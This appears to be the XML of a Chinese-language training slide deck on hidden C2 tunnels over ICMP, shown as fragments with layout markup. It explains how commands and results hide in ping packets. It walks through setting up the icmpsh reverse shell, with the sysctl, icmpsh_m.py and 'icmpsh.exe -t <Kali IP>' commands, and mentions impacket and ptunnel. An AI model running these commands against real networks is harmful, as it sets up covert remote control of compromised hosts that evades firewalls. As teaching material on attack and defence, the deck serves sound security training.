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sldIdLst>
    <p:sldId id="272" r:id="rId2"/>
    <p:sldId id="271" r:id="rId3"/>
    <p:sldId id="276" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="315" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="316" r:id="rId9"/>
    <p:sldId id="282" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="292" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="317" r:id="rId19"/>
    <p:sldId id="293" r:id="rId20"/>
    <p:sldId id="294" r:id="rId21"/>
    <p:sldId id="295" r:id="rId22"/>
    <p:sldId id="318" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="297" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="300" r:id="rId28"/>
    <p:sldId id="301" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="264" r:id="rId33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BC8"/>
    <a:srgbClr val="FACFCB"/>
    <a:srgbClr val="E13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8" autoAdjust="0"/>
    <p:restoredTop sz="94660" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="193" d="100"/>
          <a:sy n="193" d="100"/>
        </p:scale>
        <p:origin x="1072" y="272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blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l="-3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5151309" y="1564817"/>
            <a:ext cx="3562468" cy="10069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355670" y="3664243"/>
            <a:ext cx="3153746" cy="521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57808" y="1911173"/>
            <a:ext cx="3599631" cy="50432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57039" y="2702715"/>
            <a:ext cx="3599631" cy="50432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57808" y="1118811"/>
            <a:ext cx="3599631" cy="57606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000"/>
              </a:buClr>
              <a:buSzPct val="10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3pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3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729615" y="9525"/>
            <a:ext cx="4128135" cy="8572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lang="zh-CN" altLang="en-US" noProof="1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615" y="1025924"/>
            <a:ext cx="7706088" cy="2894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729615" y="9525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lang="zh-CN" altLang="en-US" noProof="1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0250" y="1114425"/>
            <a:ext cx="3841750" cy="2906713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14350" indent="-171450"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00150" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u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3050" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p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572000" y="1114425"/>
            <a:ext cx="3841750" cy="2906713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14350" indent="-171450"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00150" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u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3050" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p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729615" y="9525"/>
            <a:ext cx="6051575" cy="8572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lang="zh-CN" altLang="en-US" noProof="1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0249" y="1114425"/>
            <a:ext cx="8024767" cy="2906713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14350" indent="-171450"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00150" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u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3050" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p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2963443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729615" y="9525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1792288" y="922338"/>
            <a:ext cx="5486400" cy="1949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分级内容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564595" y="62921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lang="zh-CN" altLang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="竖排文字占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730249" y="1129348"/>
            <a:ext cx="8228965" cy="2974975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="514350" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857250" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1200150" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr sz="18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 bwMode="auto">
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect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666020" y="1769341"/>
            <a:ext cx="2551831" cy="14138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30250" y="952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1vefour/ptunnel.gi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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4282802" y="1666176"/>
            <a:ext cx="4775835" cy="1006475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐藏的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>c2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隧道</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3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兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正兰亭特黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="+mn-ea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讲师：花生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协议工作方式简介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dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>系统，默认传输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>32bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>，内容是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>abcdefghijklmnopqrstuvwabcdefghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:cs typeface="Microsoft YaHei Light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8EFE7D-684B-8549-BFF0-F91E906AA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" t="1417" r="1284" b="26336"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148874" y="2292753"/>
            <a:ext cx="4846252" cy="23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9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协议工作方式简介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dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>系统，稍显复杂，默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>传输的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>48bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>之前多了一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Timestamp from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>头，占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>8bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>固定传输的是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>!"#$%&amp;'()*+,-./012345</a:t>
            </a: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F565DD-C6A9-9544-B545-AF8697B9D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" t="1569" r="1271" b="32540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2149550" y="2571750"/>
            <a:ext cx="4844900" cy="21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隧道技术原理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由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>报文自身可以携带数据，而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>报文是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>由系统内核处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>不占用任何端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>，因此具有很高的隐蔽性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把数据隐藏在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>数据包包头的选项数据中，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>命令建立隐蔽通道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zh-CN" altLang="en-US" dirty="0">
              <a:cs typeface="Microsoft YaHei Light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E4865B-5CAD-9543-9A87-0445402FB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" t="5044" r="16566" b="6292"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2242559" y="2742708"/>
            <a:ext cx="5230382" cy="19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3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隧道技术原理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进行隐蔽传输的时候，攻击端把需要执行的命令隐藏在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP_ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>数据包中，肉鸡接收到该数据包，解出其中隐藏的命令，并在防火墙内部主机上执行，再把执行结果隐藏在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP_ECHOREPLY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>数据包中，发送给外部攻击端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zh-CN" altLang="en-US" dirty="0">
              <a:cs typeface="Microsoft YaHei Light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9732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192" y="712987"/>
            <a:ext cx="8335925" cy="47902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隧道技术原理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A7E87-2C28-594A-911B-B03B2AC7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991" r="3970" b="4062"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876961" y="866775"/>
            <a:ext cx="3732978" cy="38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6" y="87491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工具作用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>畸形的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据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icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具介绍：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icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一个简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，拥有用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Perl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实现的主控端和一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>win32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的受控端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 err="1"/>
              <a:t>Icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>很容易被安装并用作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通道，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载并在攻击者机器中部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpsh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项目地址：</a:t>
            </a:r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inquisb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpsh.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a: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76870BA7-E7A8-4245-B40D-C6A9A58744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99975" y="3918049"/>
            <a:ext cx="3944049" cy="90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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片包含 小, 砖, 播放器, 男人&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73C544C-542A-214C-BC73-52AFC73C5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t="4301" r="3567" b="7867"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1166300" y="991255"/>
            <a:ext cx="6395085" cy="26243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C7AEA3-5CAD-D24C-801A-F569C6A4238A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873513" y="3740090"/>
            <a:ext cx="588412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先下载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icmpsh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 clone https://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inquisb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icmpsh.git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09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6" y="87491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在攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上运行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kali Linux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执行之前最重要的一步是在你的机器上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>回复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。这样可以防止内核自己对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包进行响应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4FFCA7-8C5F-7647-A349-A8CA6A6E787E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488065" y="2571750"/>
            <a:ext cx="8167869" cy="1289905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indent="17145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sysctl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-w net.ipv4.icmp_echo_ignore_all=1        #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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关闭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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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回复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indent="17145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cd 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icmpsh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indent="17145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./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icmpsh_m.py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&lt;attacker’s-IP&gt; &lt;target-IP&gt;    #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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6" y="87491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安装依赖环境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4FFCA7-8C5F-7647-A349-A8CA6A6E787E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091525" y="1926797"/>
            <a:ext cx="6960950" cy="1289905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git clone https://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github.com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/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SecureAuthCorp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/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impacket.git</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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cd 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impacket</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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sudo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python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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install</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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73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4" y="77966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以从模式运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows 10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在宿主机器（目标机）中以从模式再次安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmpsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具，运行受控端的目标机器中的用户不需要具有管理员权限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然后运行以下命令：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4FFCA7-8C5F-7647-A349-A8CA6A6E787E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258569" y="2621736"/>
            <a:ext cx="4626860" cy="458908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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indent="171450" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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icmpsh.exe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-t &lt;Kali IP&gt;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843F77-E9BA-674F-B8DC-AE63909A232C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="2049" t="24259" r="12205" b="20437"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995485" y="3251586"/>
            <a:ext cx="5153025" cy="3350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97047058-41B6-A940-80C7-6FACB215B252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1619" t="7660" r="6764" b="10755"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100260" y="3739697"/>
            <a:ext cx="4943474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防御与总结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4" y="77966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ICMPSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获得反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="手机截图图社交软件的信息&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA99F489-8D1F-D543-B5F7-48F2F365410A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1576" t="1734" r="1706" b="30759"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498842" y="1428750"/>
            <a:ext cx="6146316" cy="31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4" y="77966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dirty="0" err="1"/>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带）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Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供了一款 </a:t>
            </a:r>
            <a:r>
